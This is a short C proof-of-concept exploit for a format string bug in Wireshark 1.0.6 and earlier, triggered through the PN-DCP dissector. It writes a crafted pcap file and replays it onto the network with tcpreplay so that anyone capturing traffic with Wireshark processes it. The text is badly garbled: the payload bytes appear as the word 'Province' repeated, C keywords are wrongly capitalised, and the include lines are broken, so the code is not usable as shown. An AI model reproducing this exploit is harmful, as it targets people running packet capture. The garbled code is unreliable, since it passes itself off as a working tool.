Author: friddy
If someone is sniffing with wireshark, this data will be played.
/*
################## THCX ##################### ##################
# Wireshark <= 1.0.6 PN-DCP format string bug POC
######################################## #######################
# [!] Autore: THCX Labs
# [!] PN-DCP eithor standalone or tunneld thru DCE/RPC
# [!] Local open of pcapfile also working
######################################## #######################
*/
# Include <stdio. h>
# Include <stdlib. h>
# Include <errno. h>
Char sploit [] =
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"X00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 ";
Int main (){
FILE * fh;
Int r;
Fh = fopen ("formatstringbug. pcap", "wb ");
If (! Fh) {perror ("no open"); exit (1 );}
Fwrite (sploit, sizeof sploit, 1, fh );
Fclose (fh );
R = system ("tcpreplay-I eth0 formatstringbug. pcap ");
Return 0;
}